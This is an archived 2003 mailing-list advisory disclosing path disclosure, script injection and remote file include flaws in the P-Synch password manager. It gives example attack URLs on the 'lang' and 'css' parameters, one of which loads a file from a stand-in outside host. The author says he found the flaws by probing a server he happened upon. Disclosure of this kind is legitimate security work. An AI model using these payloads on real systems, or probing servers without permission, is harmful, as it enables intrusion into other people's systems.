Multiple Vulnerabilities In P-Synch Password Management

From: JeiAr (jeiarat_private)
Date: Wed May 28 2003 - 22:26:21 PDT

Next message: phrack staff: "PHRACK MAGAZINE Call for Papers (#61)"

Previous message: Hugo : "Another ZEUS Server web admin XSS!"
Next in thread: Idan Shoham: "Re: Multiple Vulnerabilities In P-Synch Password Management"
Reply: Idan Shoham: "Re: Multiple Vulnerabilities In P-Synch Password Management"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Multiple Vulnerabilities In P-Synch Password Management ------------------------------------------------------- The other night I came across a server running P-Synch. I had never heard of it so i was curious to poke around on it a bit. Within an hour i found the vulns listed below. Im pretty sure there are other more serious vulns in P-Synch, but they are very picky about who they give thier software to, even an evaluation version. So was not able to test any further. However i encourage any admins running P-Synch to poke around on it, just to be on the safe side. Description ------------------------------------------------------- P-Synch Total Password Management Solution by M-TECH P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: -Password Synchronization. -Enforcing an enterprise wide password strength policy. -Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. -Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications. http://www.securityfocus.com/products/837 Problems ------------------------------------------------------- All of these problems are simple, self explanatory vulns so, i'm sure the below examples will speak for themselves. Once again this application was NOT thoroughly researced. So anyone with a copy of P-Synch might wanna explore it further. Path Disclosure Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psa.exe?lang= https://path/to/psynch/nph-psf.exe?lang= Code Injection Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc] https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc] File Include Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psf.exe?css=http://somesite/file https://path/to/psynch/nph-psa.exe?css=http://somesite/file Credits ------------------------------------------------------- All credits go to JeiAr of GulfTech Computers and CSA Security Research http://www.gulftech.org

Next message: phrack staff: "PHRACK MAGAZINE Call for Papers (#61)"
Previous message: Hugo : "Another ZEUS Server web admin XSS!"
Next in thread: Idan Shoham: "Re: Multiple Vulnerabilities In P-Synch Password Management"
Reply: Idan Shoham: "Re: Multiple Vulnerabilities In P-Synch Password Management"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 29 2003 - 22:51:29 PDT